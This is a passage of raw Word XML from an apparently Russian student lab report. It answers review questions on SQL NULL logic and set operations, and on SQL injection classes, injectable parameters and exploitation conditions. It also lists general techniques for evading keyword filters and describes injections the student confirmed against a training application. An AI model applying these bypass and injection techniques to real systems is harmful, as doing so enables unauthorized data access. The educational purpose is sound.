          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00572DB0">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>) не учитывает NULL, а COUNT(*) считает строки независимо от наличия NULL</w:t>
      </w:r>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E471AAD" w14:textId="7F261C4A"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 xml:space="preserve">Это различие особенно важно при сравнении </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>COUNT(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>*) и COUNT(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>). Первый вариант считает все строки группы, второй — только строки, где конкретный столбец не равен NULL. Поэтому при проверке количества документов или операций нужно выбирать подходящую форму COUNT. В лабораторной работе для подсчета документов использовался подсчет строк, так как важен сам факт наличия документа, а не заполненность отдельного необязательного поля</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F63CFB5" w14:textId="77777777" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="000639B9" w:rsidP="000639B9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33245E32" w14:textId="5F277DFD" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="00572DB0" w:rsidP="000639B9">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc229005052"/>
      <w:r>
        <w:t>Как трехзначная логика влияет на операции сравнения</w:t>
      </w:r>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="35071D45" w14:textId="2065C759"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Сравнение с NULL возвращает UNKNOWN. В условии WHERE строки проходят фильтр только при TRUE, поэтому строки с UNKNOWN отбрасываются. Это может приводить к неожиданным результатам, если не использовать IS NULL/IS NOT NULL</w:t>
      </w:r>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFAB94E" w14:textId="77777777" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="000639B9" w:rsidP="000639B9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A3CBFC" w14:textId="03C10826" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="00572DB0" w:rsidP="000639B9">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc229005053"/>
      <w:r>
        <w:t>Как трехзначная логика влияет на операции с множествами</w:t>
      </w:r>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="6916F9F0" w14:textId="0BA6B459"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При DISTINCT, UNION, INTERSECT и EXCEPT СУБД должна определять совпадение строк. В контексте устранения дубликатов NULL обычно рассматриваются как неразличимые значения в одинаковых позициях, хотя в обычных сравнениях NULL = NULL не дает TRUE</w:t>
      </w:r>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317F5D68" w14:textId="77777777" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="000639B9" w:rsidP="000639B9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2F23DD" w14:textId="538BB831" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="00572DB0" w:rsidP="000639B9">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc229005054"/>
      <w:r>
        <w:t>Какой порядок приоритета имеют операции UNION, INTERSECT, EXCEPT</w:t>
      </w:r>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="3249C20F" w14:textId="52D73458"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В </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00572DB0">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00572DB0">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> INTERSECT имеет более высокий приоритет, чем UNION и EXCEPT. UNION и EXCEPT при отсутствии скобок обычно выполняются слева направо. Для однозначности сложные выражения следует заключать в скобки</w:t>
      </w:r>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A67936" w14:textId="77777777" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="000639B9" w:rsidP="000639B9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5784FC8F" w14:textId="7EB327CD" w:rsidR="000639B9" w:rsidRPr="00CC526A" w:rsidRDefault="00572DB0" w:rsidP="00CC526A">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc229005055"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>По каким признакам можно разделить инъекции в языки запросов</w:t>
      </w:r>
      <w:r w:rsidR="00CC526A" w:rsidRPr="00CC526A">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="3105B526" w14:textId="74182EA0"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Инъекции можно классифицировать по месту внедрения (GET, POST, JSON, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00572DB0">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>cookie</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header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00572DB0">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>), по способу получения данных (UNION-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00572DB0">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>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error-based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boolean-based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blind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time-based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blind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out-of-band</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00572DB0">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>), по воздействию (чтение, изменение, обход авторизации) и по используемому языку запросов</w:t>
      </w:r>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC1B81E" w14:textId="74CB21ED"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В рамках выполненной работы были практически представлены несколько классов. Инъекция в /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> относится к POST/JSON-параметрам и позволила выполнить UNION-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> извлечение данных. Инъекция в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>category</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> относится к GET-параметрам и была подтверждена как </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>boolean-based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> и UNION-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">. Инъекция в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Authorization</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Bearer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> относится к HTTP-заголовкам и показала, что опасными могут быть не только поля формы, но и служебные параметры протокола.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43033498" w14:textId="77777777" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="000639B9" w:rsidP="000639B9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D057120" w14:textId="20FA709C" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="00572DB0" w:rsidP="000639B9">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc229005056"/>
      <w:r>
        <w:t xml:space="preserve">Какие техники может использовать злоумышленник для обхода </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>фильтрации по ключевым словам</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="089F30F2" w14:textId="7E354623"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Могут применяться изменение регистра, SQL-комментарии, URL-кодирование, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00572DB0">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Unicode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00572DB0">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>-обходы, конкатенация строк, альтернативные функции, замена пробелов комментариями, вложенные запросы и использование эквивалентных операторов</w:t>
      </w:r>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E256285" w14:textId="77777777" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="000639B9" w:rsidP="000639B9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B416168" w14:textId="58A1154C" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="00572DB0" w:rsidP="000639B9">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc229005057"/>
      <w:r>
        <w:t xml:space="preserve">В какие типы параметров может быть проведена </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="45EDFF9C" w14:textId="2FE16700" w:rsidR="000639B9" w:rsidRDefault="00572DB0" w:rsidP="000639B9">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00572DB0">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00572DB0">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> может быть проведена в параметры URL, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00572DB0">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00572DB0">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">-параметры, поля HTML-форм, JSON/XML-тела запросов, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00572DB0">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00572DB0">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>, HTTP-заголовки, параметры сортировки/фильтрации, имена файлов и любые другие данные, которые попадают в SQL-запрос</w:t>
      </w:r>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75394609" w14:textId="402880A0" w:rsidR="00CA1A09" w:rsidRPr="000639B9" w:rsidRDefault="00CA1A09" w:rsidP="000639B9">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">На практике потенциально опасен любой параметр, который </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> использует при построении SQL-запроса. В лабораторной работе это было подтверждено на трех разных типах входных данных: JSON-тело запроса авторизации, URL-параметр категории товара и HTTP-заголовок </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Authorization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Поэтому проверка приложения должна охватывать не только видимые поля ввода, но и сетевое взаимодействие приложения с API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5673E0BB" w14:textId="77777777" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="000639B9" w:rsidP="000639B9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="368156B4" w14:textId="1954D5CE" w:rsidR="000639B9" w:rsidRPr="000639B9" w:rsidRDefault="00572DB0" w:rsidP="000639B9">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc229005058"/>
      <w:r>
        <w:t xml:space="preserve">В каких случаях вообще возможна эксплуатация техники </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000639B9" w:rsidRPr="000639B9">
        <w:rPr>
          <w:rStyle w:val="affa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="0DD471D6" w14:textId="5E9CCBA5"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Эксплуатация возможна, когда пользовательский ввод без параметризации включается в SQL-запрос, а приложение возвращает результат, ошибку, различимое поведение или временную задержку. Дополнительно важны права пользователя БД и доступность интересующих таблиц</w:t>
      </w:r>
